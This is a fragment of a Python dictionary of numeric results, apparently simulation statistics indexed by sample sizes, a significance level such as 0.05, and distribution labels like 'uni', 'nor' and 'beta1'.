0.18448259911628095, 'beta2': 0.23782557049636, 'beta4': 0.16392283350600595}, 50: {'uni': 0.22331353175762125, 'nor': 0.26715148642337594, 'beta1': 0.22668241788193566, 'beta2': 0.26824852802663934, 'beta4': 0.20334391006072833}, 30: {'uni': 0.289473862453717, 'nor': 0.3214887737505831, 'beta1': 0.2875485914729527, 'beta2': 0.32630978396412536, 'beta4': 0.2697829912702217}, 20: {'uni': 0.3511642946869532, 'nor': 0.3751483594090778, 'beta1': 0.352409931529952, 'beta2': 0.3784846745898291, 'beta4': 0.33540408314790005}, 10: {'uni': 0.488706375026184, 'nor': 0.5055985987947458, 'beta1': 0.4929217350189299, 'beta2': 0.5091039256808894, 'beta4': 0.4781596967150431}}, 50: {1000: {'uni': 0.054187095918339256, 'nor': 0.16627808992474102, 'beta1': 0.05074852615107739, 'beta2': 0.17412185904693311, 'beta4': 0.039691505151292106}, 750: {'uni': 0.062058115432295474, 'nor': 0.17238046742698188, 'beta1': 0.059084035023102, 'beta2': 0.17597952934137606, 'beta4': 0.04541331900508322}, 500: {'uni': 0.07423220817161519, 'nor': 0.1792687852250358, 'beta1': 
0.07197857057706736, 'beta2': 0.1818195777041135, 'beta4': 0.05569462226316452}, 400: {'uni': 0.08254206840442069, 'nor': 0.1825333888879272, 'beta1': 0.08099479940703191, 'beta2': 0.18984048447922675, 'beta4': 0.06357941522010713}, 300: {'uni': 0.09474363323614166, 'nor': 0.18834315888900854, 'beta1': 0.09343612898219089, 'beta2': 0.1924669867698795, 'beta4': 0.07309401794651404}, 200: {'uni': 0.11623368179709986, 'nor': 0.20107102192718945, 'beta1': 0.1147080452043604, 'beta2': 0.20330128778291234, 'beta4': 0.09144934593281676}, 150: {'uni': 0.13323158697545257, 'nor': 0.2113741612304923, 'beta1': 0.13089326840146875, 'beta2': 0.21101409732714788, 'beta4': 0.1080905839738153}, 100: {'uni': 0.1610409156149188, 'nor': 0.23200918860179387, 'beta1': 0.16001862287729518, 'beta2': 0.23225218169591122, 'beta4': 0.13330220075686566}, 75: {'uni': 0.18275303987938896, 'nor': 0.2503116552370775, 'beta1': 0.18535594744801204, 'beta2': 0.2435558750806069, 'beta4': 0.15726325930804558}, 50: {'uni': 0.2246149371985376, 'nor': 0.2833867880515266, 'beta1': 0.22456825644221368, 'beta2': 0.27550623451671474, 'beta4': 0.1978109061797627}, 30: {'uni': 0.2872878605199388, 'nor': 0.3386232243962164, 'beta1': 0.28579575210477914, 'beta2': 0.33471410391675205, 'beta4': 0.26584890073856127}, 20: {'uni': 0.3523359671395369, 'nor': 0.3883193259633752, 'beta1': 0.34980199502356346, 'beta2': 0.38521307572061386, 'beta4': 0.32550253808599006}, 10: {'uni': 0.48543686550596693, 'nor': 0.5182694839209849, 'beta1': 0.49221988171682085, 'beta2': 0.5153967620456474, 'beta4': 0.4700594688479634}}, 30: {1000: {'uni': 0.058918924239352466, 'nor': 0.21297337163268276, 'beta1': 0.0518167432973049, 'beta2': 0.195446267914975, 'beta4': 0.03908638506448431}, 750: {'uni': 0.06572796327401753, 'nor': 0.21595057482420588, 'beta1': 0.059259512312420104, 'beta2': 0.19755323997975416, 'beta4': 0.045197433532028874}, 500: {'uni': 0.07686236514630335, 'nor': 0.22226563318166248, 'beta1': 0.07177928002902467, 
'beta2': 0.2056526292300077, 'beta4': 0.05493149389715696}, 400: {'uni': 0.08465975831568184, 'nor': 0.2252684454523387, 'beta1': 0.08123930027330767, 'beta2': 0.2099099100664712, 'beta4': 0.06217418123201823}, 300: {'uni': 0.09651070474378282, 'nor': 0.2300730633949879, 'beta1': 0.09323619984546516, 'beta2': 0.2120833703149353, 'beta4': 0.07312418047556249}, 200: {'uni': 0.11605617135066404, 'nor': 0.2431502125103765, 'beta1': 0.11353867501894094, 'beta2': 0.21682074894377878, 'beta4': 0.08933031413363546}, 150: {'uni': 0.13410472341858543, 'nor': 0.24725518547910333, 'beta1': 0.1318999891275866, 'beta2': 0.22942799747160325, 'beta4': 0.10272810181706044}, 100: {'uni': 0.16196955748999547, 'nor': 0.2700012320341486, 'beta1': 0.15871486988261296, 'beta2': 0.24514818382512593, 'beta4': 0.13010131517540321}, 75: {'uni': 0.1835418878236575, 'nor': 0.28467491610667683, 'beta1': 0.18546450563511369, 'beta2': 0.26290322403314065, 'beta4': 0.15276528672305534}, 50: {'uni': 0.22509609698193117, 'nor': 0.3142329116082755, 'beta1': 0.22663224055326758, 'beta2': 0.2919325149774068, 'beta4': 0.18996462242195666}, 30: {'uni': 0.2897752445348868, 'nor': 0.359326156047137, 'beta1': 0.29020063665136886, 'beta2': 0.34273751996321067, 'beta4': 0.2529174520482719}, 20: {'uni': 0.344005648632975, 'nor': 0.42004384529396105, 'beta1': 0.34658611138046264, 'beta2': 0.3902673253680207, 'beta4': 0.31692923991569927}, 10: {'uni': 0.4837000884491306, 'nor': 0.5316468101838533, 'beta1': 0.48249080675172323, 'beta2': 0.5194341288716998, 'beta4': 0.4603664888921414}}, 20: {1000: {'uni': 0.06597487107762767, 'nor': 0.26293245683028, 'beta1': 0.05120820169191942, 'beta2': 0.22017115245446095, 'beta4': 0.038916881153397975}, 750: {'uni': 0.07269217456814536, 'nor': 0.2667557058726879, 'beta1': 0.059583644657734885, 'beta2': 0.2217993564160058, 'beta4': 0.04508243513408289}, 500: {'uni': 0.08323814797112672, 'nor': 0.2728795944957957, 'beta1': 0.07257265729126575, 'beta2': 0.2282291849514998, 
'beta4': 0.055068233755242446}, 400: {'uni': 0.09072350595679135, 'nor': 0.2723668419179453, 'beta1': 0.08056174054012066, 'beta2': 0.22597367362057608, 'beta4': 0.06169261835040951}, 300: {'uni': 0.10083188986577823, 'nor': 0.27712117006626796, 'beta1': 0.09318059105121618, 'beta2': 0.23326141016132318, 'beta4': 0.07091172628182563}, 200: {'uni': 0.12110756732550038, 'nor': 0.2855441269934709, 'beta1': 0.1157486267208615, 'beta2': 0.23795719725720738, 'beta4': 0.08927441431005056}, 150: {'uni': 0.13598733501466506, 'nor': 0.2907323977734544, 'beta1': 0.13109115777861102, 'beta2': 0.25318192125603234, 'beta4': 0.10332852211836979}, 100: {'uni': 0.1639431522658722, 'nor': 0.31152417983746605, 'beta1': 0.16155024590107747, 'beta2': 0.262103768140855, 'beta4': 0.12609462698530394}, 75: {'uni': 0.18685165128081893, 'nor': 0.3254693717012144, 'beta1': 0.18397251726711683, 'beta2': 0.27915696455084993, 'beta4': 0.14785181380565982}, 50: {'uni': 0.22761062573955604, 'nor': 0.3522320739163892, 'beta1': 0.2256099922364685, 'beta2': 0.30883291813380065, 'beta4': 0.18365089973024573}, 30: {'uni': 0.289203483511623, 'nor': 0.4011670663050516, 'beta1': 0.2891477181429253, 'beta2': 0.35472219797014837, 'beta4': 0.24745951418710105}, 20: {'uni': 0.34667459614575846, 'nor': 0.44850723188809377, 'beta1': 0.35113197277916386, 'beta2': 0.4044647849108889, 'beta4': 0.3126967400538809}, 10: {'uni': 0.48476115016520405, 'nor': 0.554406017917817, 'beta1': 0.4817528515392736, 'beta2': 0.5313493222964868, 'beta4': 0.4483656416548137}}, 10: {1000: {'uni': 0.09689632012426586, 'nor': 0.37891222572877614, 'beta1': 0.09112144529033561, 'beta2': 0.2586988400624156, 'beta4': 0.03900835588583823}, 750: {'uni': 0.10064795489220457, 'nor': 0.383188375068864, 'beta1': 0.09112850229049962, 'beta2': 0.2640286285324004, 'beta4': 0.04502182335240068}, 500: {'uni': 0.10802210321588324, 'nor': 0.3884962880934829, 'beta1': 0.0911721599997744, 'beta2': 0.27079265676023156, 'beta4': 0.05453895677656284}, 
400: {'uni': 0.11304279449008725, 'nor': 0.3889920925008913, 'beta1': 0.0912685747102537, 'beta2': 0.26870553332669633, 'beta4': 0.0616433432574133}, 300: {'uni': 0.12154400796026772, 'nor': 0.39206198235198325, 'beta1': 0.09483352592096467, 'beta2': 0.2724084181642078, 'beta4': 0.07113409099304874}, 200: {'uni': 0.1347088080476393, 'nor': 0.3989961151096316, 'beta1': 0.11465623517387658, 'beta2': 0.2801925598985867, 'beta4': 0.08778892448680453}, 150: {'uni': 0.14950650016574885, 'nor': 0.4074020676124349, 'beta1': 0.1319362581048737, 'beta2': 0.2882295441811764, 'beta4': 0.09979505237411807}, 100: {'uni': 0.1746199496093277, 'nor': 0.41995987192595596, 'beta1': 0.1606353579518667, 'beta2': 0.3046266455964683, 'beta4': 0.12499057927159085}, 75: {'uni': 0.1963173328176369, 'nor': 0.4305939349118369, 'beta1': 0.1853892160990983, 'beta2': 0.3141345572002111, 'beta4': 0.14329993044048847}, 50: {'uni': 0.23406933928651003, 'nor': 0.4528491146162036, 'beta1': 0.22664378023198406, 'beta2': 0.3345469784583225, 'beta4': 0.17784420010893143}, 30: {'uni': 0.29324923220629134, 'nor': 0.4874432234123751, 'beta1': 0.2893385819235859, 'beta2': 0.3762716610461486, 'beta4': 0.2340649401769095}, 20: {'uni': 0.35290644687931416, 'nor': 0.5339309604641884, 'beta1': 0.3494325720267195, 'beta2': 0.42149057999190237, 'beta4': 0.29349793334316515}, 10: {'uni': 0.4819570489345161, 'nor': 0.621282121995842, 'beta1': 0.48228312064803025, 'beta2': 0.531072925087128, 'beta4': 0.42676946077577815}}}, 0.05: {1000: {1000: {'uni': 0.04250873596535332, 'nor': 0.05211322056354162, 'beta1': 0.04306205955872783, 'beta2': 0.08035999046629705, 'beta4': 0.03797796698498185}, 750: {'uni': 0.04939044076050647, 'nor': 0.057928759168451305, 'beta1': 0.04956386512094496, 'beta2': 0.08255880301550844, 'beta4': 0.04460825923337863}, 500: {'uni': 0.060593693593500864, 'nor': 0.06752114560687372, 'beta1': 0.060391364928257474, 'beta2': 0.08816209252857421, 'beta4': 0.05607127534968437}, 400: {'uni': 
0.0673055881110432, 'nor': 0.07339531978449776, 'beta1': 0.06742981404562332, 'beta2': 0.09222999610749227, 'beta4': 0.06293590114601089}, 300: {'uni': 0.07829316510351103, 'nor': 0.08373775958480117, 'beta1': 0.07775258426053894, 'beta2': 0.10010817811684236, 'beta4': 0.07394283107208066}, 200: {'uni': 0.09529933382323597, 'nor': 0.10000749443187817, 'beta1': 0.09514079230112737, 'beta2': 0.11393345537368338, 'beta4': 0.0917178764665584}, 150: {'uni': 0.1095050668662032, 'nor': 0.1131765255844498, 'beta1': 0.10961338251417468, 'beta2': 0.12625941180627626, 'beta4': 0.10701383836580813}, 100: {'uni': 0.13504293819410917, 'nor': 0.13789756284368515, 'beta1': 0.13448261128725092, 'beta2': 0.1469163714586994, 'beta4': 0.13105762405283972}, 75: {'uni': 0.15512998752952264, 'nor': 0.15736947708421162, 'beta1': 0.15460254067269846, 'beta2': 0.16654377290913044, 'beta4': 0.1511024290565549}, 50: {'uni': 0.18856009448236644, 'nor': 0.1906997936343151, 'beta1': 0.1884576993592476, 'beta2': 0.1982428759858742, 'beta4': 0.18622204644381843}, 30: {'uni': 0.2398807672306324, 'nor': 0.24412240717703027, 'beta1': 0.24053994368488707, 'beta2': 0.24870244801951652, 'beta4': 0.23887135097093648}, 20: {'uni': 0.29368464372283687, 'nor': 0.2955974928774556, 'beta1': 0.2925421511499017, 'beta2': 0.29823721632962963, 'beta4': 0.2937927014266898}, 10: {'uni': 0.40809844072326357, 'nor': 0.40905711558389374, 'beta1': 0.4074293842569355, 'beta2': 0.41442818653088903, 'beta4': 0.4102533723801786}}, 750: {1000: {'uni': 0.04313132347462212, 'nor': 0.055054467531027274, 'beta1': 0.042903624792836825, 'beta2': 0.08085753121993888, 'beta4': 0.037165583736955776}, 750: {'uni': 0.04934405850774021, 'nor': 0.06012658528358911, 'beta1': 0.04926360659177581, 'beta2': 0.08292295419216378, 'beta4': 0.04421364295003938}, 500: {'uni': 0.060341804714815095, 'nor': 0.07033647349548888, 'beta1': 0.060558717006613694, 'beta2': 0.08863522371969174, 'beta4': 0.05517938622481133}, 400: {'uni': 
0.06747724189757476, 'nor': 0.07601553392118676, 'beta1': 0.06753738114806768, 'beta2': 0.09286935098393112, 'beta4': 0.06258866218729964}, 300: {'uni': 0.0779234041757913, 'nor': 0.08581112098260912, 'beta1': 0.07752436380641886, 'beta2': 0.10025969540588678, 'beta4': 0.0727070225966075}, 200: {'uni': 0.09529011628998052, 'nor': 0.10157134239672405, 'beta1': 0.09532196270657745, 'beta2': 0.114717619457614, 'beta4': 0.09084936265846794}, 150: {'uni': 0.10929839951597176, 'nor': 0.11416074257244094, 'beta1': 0.10964416703357704, 'beta2': 0.1261134555516631, 'beta4': 0.10586630629141039}, 100: {'uni': 0.13402537604739173, 'nor': 0.13946500057705635, 'beta1': 0.13339315942045915, 'beta2': 0.14779247908517917, 'beta4': 0.12987399411308242}, 75: {'uni': 0.15491927659856863, 'nor': 0.15726063343810553, 'beta1': 0.15463569652056147, 'beta2': 0.1679004949850389, 'beta4': 0.1524841664459506}, 50: {'uni': 0.18831823725744598, 'nor': 0.19163748416973814, 'beta1': 0.1884166302028113, 'beta2': 0.19811874878971442, 'beta4': 0.18759940893926474}, 30: {'uni': 0.24249816383380124, 'nor': 0.2448871814993652, 'beta1': 0.24185014536823451, 'beta2': 0.24980128317227762, 'beta4': 0.2421287830978741}, 20: {'uni': 0.2940118546518854, 'nor': 0.29331856753560476, 'beta1': 0.29360254728317475, 'beta2': 0.30182924197426564, 'beta4': 0.29353502143027616}, 10: {'uni': 0.4087141031810262, 'nor': 0.41170613228789243, 'beta1': 0.4094888928024222, 'beta2': 0.41617469535239165, 'beta4': 0.4111278779658915}}, 500: {1000: {'uni': 0.0429345704660003, 'nor': 0.05932234329262365, 'beta1': 0.042727156109620246, 'beta2': 0.08510210997179135, 'beta4': 0.036257982752805895}, 750: {'uni': 0.049265441580142344, 'nor': 0.06453072581186886, 'beta1': 0.04952462754419623, 'beta2': 0.0880626740533288, 'beta4': 0.04274970287381094}, 500: {'uni': 0.06051345692735122, 'nor': 0.07405810203028496, 'beta1': 0.06013137064686658, 'beta2': 0.09405433515075423, 'beta4': 0.05362451219159059}, 400: {'uni': 0.06726638579663013, 
'nor': 0.0793534053635837, 'beta1': 0.06761300772776771, 'beta2': 0.0996414553379194, 'beta4': 0.061074275253972965}, 300: {'uni': 0.07752111447176113, 'nor': 0.08853014421612171, 'beta1': 0.07790127912387818, 'beta2': 0.10591589294909354, 'beta4': 0.07149101529018864}, 200: {'uni': 0.09553432289253411, 'nor': 0.10474513086458981, 'beta1': 0.09491138965654433, 'beta2': 0.11924936822193555, 'beta4': 0.089970363011452}, 150: {'uni': 0.11049256971537569, 'nor': 0.11834670194031227, 'beta1': 0.11055795759911412, 'beta2': 0.13284580636545373, 'beta4': 0.1045099293615413}, 100: {'uni': 0.1325888031595155, 'nor': 0.1416642277128064, 'beta1': 0.13487031887436052, 'beta2': 0.15320832506486431, 'beta4': 0.12989554029630124}, 75: {'uni': 0.15407104188981624, 'nor': 0.1599128393935123, 'beta1': 0.15374710784163467, 'beta2': 0.16941911839219415, 'beta4': 0.150389415793519}, 50: {'uni': 0.18908047311103032, 'nor': 0.19373367790298657, 'beta1': 0.18889964131492282, 'beta2': 0.20132986679665088, 'beta4': 0.1846732957113127}, 30: {'uni': 0.24226077908740745, 'nor': 0.24727230642152115, 'beta1': 0.24238358313543917, 'beta2': 0.2513661790960438, 'beta4': 0.23977316063110243}, 20: {'uni': 0.2932302698568148, 'nor': 0.2947506771756141, 'beta1': 0.2938361058917397, 'beta2': 0.30338566870485817, 'beta4': 0.2894081827795897}, 10: {'uni': 0.4095412142044333, 'nor': 0.41582272767182626, 'beta1': 0.4091307634899183, 'beta2': 0.41139636575315974, 'beta4': 0.4078258054114057}}, 400: {1000: {'uni': 0.04255614948733477, 'nor': 0.06271520295830779, 'beta1': 0.042499298590381596, 'beta2': 0.08456650823704548, 'beta4': 0.03580234989921294}, 750: {'uni': 0.04937518706328403, 'nor': 0.06777109574937312, 'beta1': 0.049367906001651085, 'beta2': 0.08730333067407448, 'beta4': 0.04221923686249307}, 500: {'uni': 0.06056747910036231, 'nor': 0.07722766386556512, 'beta1': 0.060303960376819954, 'beta2': 0.09289270953205328, 'beta4': 0.05248883908484214}, 400: {'uni': 0.06728484592171763, 'nor': 
0.08236276990821306, 'beta1': 0.06746558979046141, 'beta2': 0.09825313200635855, 'beta4': 0.06025406262496252}, 300: {'uni': 0.07820323026110898, 'nor': 0.09073559074460608, 'beta1': 0.07821541358546946, 'beta2': 0.10636367292497817, 'beta4': 0.0707215219370873}, 200: {'uni': 0.09539601064885839, 'nor': 0.10556303670070322, 'beta1': 0.09561582053237683, 'beta2': 0.12180562887877411, 'beta4': 0.08801801823329147}, 150: {'uni': 0.10936714369824918, 'nor': 0.11926537223910565, 'beta1': 0.10969157845228705, 'beta2': 0.13244557387181255, 'beta4': 0.10341522850743123}, 100: {'uni': 0.13354393257412983, 'nor': 0.1423512660895025, 'beta1': 0.1349214446210324, 'beta2': 0.15303126855995564, 'beta4': 0.12836102685714074}, 75: {'uni': 0.1539128338395579, 'nor': 0.16324678205317678, 'beta1': 0.15405133046909722, 'beta2': 0.17098592920893618, 'beta4': 0.14957593956825316}, 50: {'uni': 0.18775635329386392, 'nor': 0.1937191005204043, 'beta1': 0.1884271730141419, 'beta2': 0.20435458644695162, 'beta4': 0.1843870264363775}, 30: {'uni': 0.24284157129386047, 'nor': 0.24629860436826123, 'beta1': 0.2408640216307077, 'beta2': 0.25171500005639674, 'beta4': 0.23632331131142947}, 20: {'uni': 0.294735259283024, 'nor': 0.3000105461174386, 'beta1': 0.29458072221349885, 'beta2': 0.3014785462051059, 'beta4': 0.2909045447121572}, 10: {'uni': 0.4103919628714764, 'nor': 0.41225052464658113, 'beta1': 0.41060821792134156, 'beta2': 0.4163793146371585, 'beta4': 0.40742898042098596}}, 300: {1000: {'uni': 0.042894438722122286, 'nor': 0.06804466454865021, 'beta1': 0.042975744332918175, 'beta2': 0.0888244060704032, 'beta4': 0.03506422723776037}, 750: {'uni': 0.04935072830414078, 'nor': 0.0725923011358739, 'beta1': 0.04961504811513984, 'beta2': 0.09140206098548131, 'beta4': 0.04167378331875227}, 500: {'uni': 0.06083268710478407, 'nor': 0.08079774711138776, 'beta1': 0.060462958380593346, 'beta2': 0.09864492613316656, 'beta4': 0.05224950308205284}, 400: {'uni': 0.06740667823442481, 'nor': 0.08662549045486634, 
'beta1': 0.06812433004180829, 'beta2': 0.10449231525526514, 'beta4': 0.05889668522599231}, 300: {'uni': 0.07759043263185894, 'nor': 0.09466518723563278, 'beta1': 0.07761370429428577, 'beta2': 0.11256171095061174, 'beta4': 0.06901393087520213}, 200: {'uni': 0.09501186068000178, 'nor': 0.11045546634746517, 'beta1': 0.09545154794009353, 'beta2': 0.12529152669670096, 'beta4': 0.08590491171623238}, 150: {'uni': 0.10913769973038989, 'nor': 0.12308354696458895, 'beta1': 0.10968689772848039, 'beta2': 0.1357602716808839, 'beta4': 0.1014492424455633}, 100: {'uni': 0.13555693310048833, 'nor': 0.14414239978154153, 'beta1': 0.13509394899970356, 'beta2': 0.15724894818388713, 'beta4': 0.12712742588054968}, 75: {'uni': 0.1528796701368813, 'nor': 0.16337025975562974, 'beta1': 0.15343029335140113, 'beta2': 0.17613550383491916, 'beta4': 0.14800406699526014}, 50: {'uni': 0.18792883570862817, 'nor': 0.19765009586613413, 'beta1': 0.18912520193521853, 'beta2': 0.2052442637463902, 'beta4': 0.1817694823681486}, 30: {'uni': 0.24126343910617895, 'nor': 0.24731827586722788, 'beta1': 0.24270517877017284, 'beta2': 0.2557802201638789, 'beta4': 0.23627972110713036}, 20: {'uni': 0.2926059984655144, 'nor': 0.2986919482722732, 'beta1': 0.2923500002958017, 'beta2': 0.30460634421517385, 'beta4': 0.28973301373812854}, 10: {'uni': 0.4102473624031447, 'nor': 0.415040095717406, 'beta1': 0.4086610684156582, 'beta2': 0.41242893849078294, 'beta4': 0.40337056089025664}}, 200: {1000: {'uni': 0.04292620281905324, 'nor': 0.07789366288788169, 'beta1': 0.042909295701843875, 'beta2': 0.09598401017764835, 'beta4': 0.03444818222651283}, 750: {'uni': 0.049116893075300094, 'nor': 0.08192589013572071, 'beta1': 0.049261303877093376, 'beta2': 0.09942309864768661, 'beta4': 0.04066451451600811}, 500: {'uni': 0.06050980125495031, 'nor': 0.08870178975680876, 'beta1': 0.06019971884940478, 'beta2': 0.10568112520914552, 'beta4': 0.050818961275074126}, 400: {'uni': 0.06739439830856109, 'nor': 0.09366639653726616, 'beta1': 
0.06764647221850328, 'beta2': 0.11327801797692638, 'beta4': 0.05737622556223043}, 300: {'uni': 0.07777244883862433, 'nor': 0.10218475647374542, 'beta1': 0.07789235265143774, 'beta2': 0.11913850063835685, 'beta4': 0.0674525332548831}, 200: {'uni': 0.09502704520860905, 'nor': 0.11604045896624948, 'beta1': 0.09510463516896728, 'beta2': 0.13172961091169733, 'beta4': 0.0847162185101194}, 150: {'uni': 0.11016636440205546, 'nor': 0.12811765905677236, 'beta1': 0.10970368873875014, 'beta2': 0.14331145199787, 'beta4': 0.09995453264910176}, 100: {'uni': 0.13445642653897671, 'nor': 0.1497382854380087, 'beta1': 0.13348683808905348, 'beta2': 0.16329669247250422, 'beta4': 0.12465846974308342}, 75: {'uni': 0.15419888978141394, 'nor': 0.16923478439093248, 'beta1': 0.1534954671086292, 'beta2': 0.17909152766875147, 'beta4': 0.14538034559889523}, 50: {'uni': 0.1867393471217101, 'nor': 0.19994040891868026, 'beta1': 0.18704772643881146, 'beta2': 0.20860701598862752, 'beta4': 0.18028390140578754}, 30: {'uni': 0.24085839007149673, 'nor': 0.25196638732921794, 'beta1': 0.2416028527023132, 'beta2': 0.258985786530043, 'beta4': 0.23484197182299332}, 20: {'uni': 0.2938289434391539, 'nor': 0.30183924391245415, 'beta1': 0.2929710538077763, 'beta2': 0.30847428056222437, 'beta4': 0.2887648891428266}, 10: {'uni': 0.409241850795313, 'nor': 0.41624360452445025, 'beta1': 0.4073016819406742, 'beta2': 0.41919073368911525, 'beta4': 0.4050765267408517}}, 150: {1000: {'uni': 0.04291723660518407, 'nor': 0.08563558848858943, 'beta1': 0.042846891281439425, 'beta2': 0.10223899504388945, 'beta4': 0.03395439572798897}, 750: {'uni': 0.04950013649203988, 'nor': 0.08925938870000594, 'beta1': 0.04965224665621104, 'beta2': 0.10696078885236882, 'beta4': 0.040016846887239776}, 500: {'uni': 0.06056262216642466, 'nor': 0.09643747097853617, 'beta1': 0.060400676674767784, 'beta2': 0.11473400680347212, 'beta4': 0.04951486955132711}, 400: {'uni': 0.06764529037263078, 'nor': 0.10144512010371015, 'beta1': 0.06753205660512529, 
'beta2': 0.11877629190302957, 'beta4': 0.05635636540840383}, 300: {'uni': 0.07833927823257347, 'nor': 0.10837393046444554, 'beta1': 0.07800217882792032, 'beta2': 0.12395861166633126, 'beta4': 0.06599964488218174}, 200: {'uni': 0.09545996993358469, 'nor': 0.12238507175537305, 'beta1': 0.09520988149732268, 'beta2': 0.13705221967657688, 'beta4': 0.0834232463067639}, 150: {'uni': 0.10950500818109843, 'nor': 0.13336780634865708, 'beta1': 0.10925207483454008, 'beta2': 0.14838697874181017, 'beta4': 0.09817686727672598}, 100: {'uni': 0.13308106007624088, 'nor': 0.15584852299459984, 'beta1': 0.13507681514120773, 'beta2': 0.16768636533102133, 'beta4': 0.12178061197560497}, 75: {'uni': 0.15418797319776234, 'nor': 0.17295736209751258, 'beta1': 0.154058224278319, 'beta2': 0.1837034986222184, 'beta4': 0.14349011466146278}, 50: {'uni': 0.18847911332805245, 'nor': 0.20361778090060745, 'beta1': 0.1875078531942039, 'beta2': 0.21225663088149105, 'beta4': 0.17857036568803114}, 30: {'uni': 0.24059443804418118, 'nor': 0.2533108674087146, 'beta1': 0.24179550981403275, 'beta2': 0.26178390187576706, 'beta4': 0.23390865892313567}, 20: {'uni': 0.2937042322632649, 'nor': 0.3041869530968494, 'beta1': 0.29418747362409225, 'beta2': 0.3085038537053799, 'beta4': 0.28520167726380585}, 10: {'uni': 0.4096756554001893, 'nor': 0.4139326107135924, 'beta1': 0.40764137118865473, 'beta2': 0.4204038401226778, 'beta4': 0.40388108256901817}}, 100: {1000: {'uni': 0.04342664844495059, 'nor': 0.09884840155194324, 'beta1': 0.04276716681381737, 'beta2': 0.11054081774012758, 'beta4': 0.03371827577803044}, 750: {'uni': 0.049919916608987536, 'nor': 0.10252531304078716, 'beta1': 0.049091134507803946, 'beta2': 0.11423138192179594, 'beta4': 0.039323577549201905}, 500: {'uni': 0.06043645792785113, 'nor': 0.10917860950531716, 'beta1': 0.06024574518941972, 'beta2': 0.12114708952686687, 'beta4': 0.04863716851296296}, 400: {'uni': 0.06810271497020282, 'nor': 0.11445445573077262, 'beta1': 0.0680246885765276, 'beta2': 
0.12474816718751847, 'beta4': 0.05470345449215924}, 300: {'uni': 0.07806624398748752, 'nor': 0.12160241052743598, 'beta1': 0.07813676478342219, 'beta2': 0.1303621178249335, 'beta4': 0.06435103186819638}, 200: {'uni': 0.09516451469508691, 'nor': 0.13371593064376386, 'beta1': 0.09486007398939739, 'beta2': 0.14197473394490534, 'beta4': 0.08070835746272365}, 150: {'uni': 0.10951349007838795, 'nor': 0.1448092189751769, 'beta1': 0.11000810280674456, 'beta2': 0.15405644251908213, 'beta4': 0.09448304115287848}, 100: {'uni': 0.13402144727255166, 'nor': 0.16360851635146456, 'beta1': 0.13373829847036145, 'beta2': 0.17388573367926863, 'beta4': 0.11887279870190737}, 75: {'uni': 0.1534775863899963, 'nor': 0.18082984868868635, 'beta1': 0.15472434640745825, 'beta2': 0.18922729311202852, 'beta4': 0.14064103105650327}, 50: {'uni': 0.1878076047125296, 'nor': 0.21174139971723732, 'beta1': 0.18900505952391644, 'beta2': 0.21597325299721343, 'beta4': 0.17504570451647083}, 30: {'uni': 0.24109983939699636, 'nor': 0.26128460107527085, 'beta1': 0.24202652974714423, 'beta2': 0.26394060641591655, 'beta4': 0.22998071380591711}, 20: {'uni': 0.29266727403084003, 'nor': 0.3103114840471122, 'beta1': 0.29512024524547165, 'beta2': 0.31286929353450027, 'beta4': 0.2848189838493475}, 10: {'uni': 0.4067165104704334, 'nor': 0.4189143169125569, 'beta1': 0.4090630015368414, 'beta2': 0.42152641633430715, 'beta4': 0.4002321833577583}}, 75: {1000: {'uni': 0.0438399424685616, 'nor': 0.11214377089086885, 'beta1': 0.04280400130427986, 'beta2': 0.11639932218811577, 'beta4': 0.033393127995971994}, 750: {'uni': 0.050249501777054006, 'nor': 0.11453879357778812, 'beta1': 0.0491045026978259, 'beta2': 0.12063794198664923, 'beta4': 0.03872341367170215}, 500: {'uni': 0.06108895227688799, 'nor': 0.12072978462890072, 'beta1': 0.0601270340866209, 'beta2': 0.12562241974534927, 'beta4': 0.04827155944884867}, 400: {'uni': 0.06782565480281566, 'nor': 0.12548350271549236, 'beta1': 0.06724131663497068, 'beta2': 
0.12960446320697638, 'beta4': 0.05409657961615677}, 300: {'uni': 0.07851141408408377, 'nor': 0.13200511669657544, 'beta1': 0.077898151231101, 'beta2': 0.13654271371225812, 'beta4': 0.0637511735240166}, 200: {'uni': 0.09475898024659712, 'nor': 0.14327147451372735, 'beta1': 0.09501686919706781, 'beta2': 0.14759803188477688, 'beta4': 0.07871855013071921}, 150: {'uni': 0.10925599343816059, 'nor': 0.15297899030445272, 'beta1': 0.11015254323591961, 'beta2': 0.15768755238961485, 'beta4': 0.09295209765219048}, 100: {'uni': 0.13396368251923452, 'nor': 0.17179721647955526, 'beta1': 0.13345037859887932, 'beta2': 0.17765805845455007, 'beta4': 0.11642943784237603}, 75: {'uni': 0.15477736670546938, 'nor': 0.18895714897457644, 'beta1': 0.1539493080965768, 'beta2': 0.19447171707960897, 'beta4': 0.13724563488543373}, 50: {'uni': 0.18839002568598873, 'nor': 0.2180305171258889, 'beta1': 0.18831553334906875, 'beta2': 0.22129833914948438, 'beta4': 0.17275056471332206}, 30: {'uni': 0.24008961544263907, 'nor': 0.2650822786621322, 'beta1': 0.24252815499954994, 'beta2': 0.2688272811098853, 'beta4': 0.22663105019759328}, 20: {'uni': 0.2921433063597944, 'nor': 0.3141023199173227, 'beta1': 0.29340687139823474, 'beta2': 0.31266965958300064, 'beta4': 0.2804024303421781}, 10: {'uni': 0.41107290577052813, 'nor': 0.4263383340359735, 'beta1': 0.40828688918554545, 'beta2': 0.4250783970409252, 'beta4': 0.3988900709580016}}, 50: {1000: {'uni': 0.045319055803388075, 'nor': 0.13372164617361332, 'beta1': 0.042622363121129214, 'beta2': 0.13054115789301413, 'beta4': 0.03301256635793812}, 750: {'uni': 0.05163228099424677, 'nor': 0.1349664254862753, 'beta1': 0.0496423021703164, 'beta2': 0.13446750687108505, 'beta4': 0.0385279485772233}, 500: {'uni': 0.061439306229550794, 'nor': 0.14055103421779302, 'beta1': 0.060142216296224515, 'beta2': 0.13752593042865568, 'beta4': 0.04724339812053602}, 400: {'uni': 0.0693663795699413, 'nor': 0.14556747938193393, 'beta1': 0.06738356899478581, 'beta2': 0.14143610440720644, 
